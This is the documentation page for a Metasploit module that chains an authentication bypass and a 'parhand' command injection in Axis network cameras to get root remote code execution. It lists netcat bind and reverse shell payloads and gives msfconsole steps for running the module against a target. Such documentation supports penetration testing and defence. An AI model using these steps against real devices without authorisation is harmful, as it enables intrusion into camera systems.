This module exploits multiple vulnerabilities against Axis Network Cameras, including an authentication
bypass in the .srv functionality, as well as a command injection in "parhand", in order to gain
arbitrary remote code execution under the context of root.

The exploit currently only supports the following payloads:

* cmd/unix/bind_netcat_gaping
* cmd/unix/reverse_netcat_gaping

## Vulnerable Application

The particular firmware (Companion Dome V) tested for this exploit was 6.15.4, web version 16.05.02.

For a list of affected Axis products, please go to the following page:
https://www.axis.com/files/sales/ACV-128401_Affected_Product_List.pdf

## Verification Steps

1. Start msfconsole
2. Do: `exploit/linux/http/axis_srv_parhand_rce`
3. Do: `set rhosts [IP]`
4. Do: `show payloads` to select a payload (that is not ipv6)
5. Do: `set payload [name of payload]`
6. Set LHOST if you are using a reverse shell
7. Do: `run`
8. You should get a session